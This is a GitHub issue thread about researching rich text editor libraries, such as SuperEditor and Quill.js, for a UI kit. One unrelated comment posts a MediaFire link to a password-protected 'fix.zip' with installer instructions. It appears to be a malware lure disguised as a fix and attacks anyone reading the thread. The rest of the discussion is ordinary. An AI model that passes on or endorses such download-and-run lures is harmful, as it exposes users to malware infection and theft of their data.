### ISSUE TITLE
🛠️ [TASK] : RichText editor spike

### ISSUE THREAD

**Issue by damian-molinski** [input-output-hk/catalyst-voices#716]
### Summary

UI Kit components: RichText Editor

### Description

Goal of this task is to research available options for rich text editing libraries eg. **markdown**.

### Output:

- UI Examples
- Output format
- Niels and Mikes see available options and decide wheter they are sufficient or not.
- Backend team (Steven?) can work with format.

### Early research libs:

- [SuperEditor](https://pub.dev/packages/super_editor)

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by minikin** [comment]
Let's also explore storing formated text using https://quilljs.com/
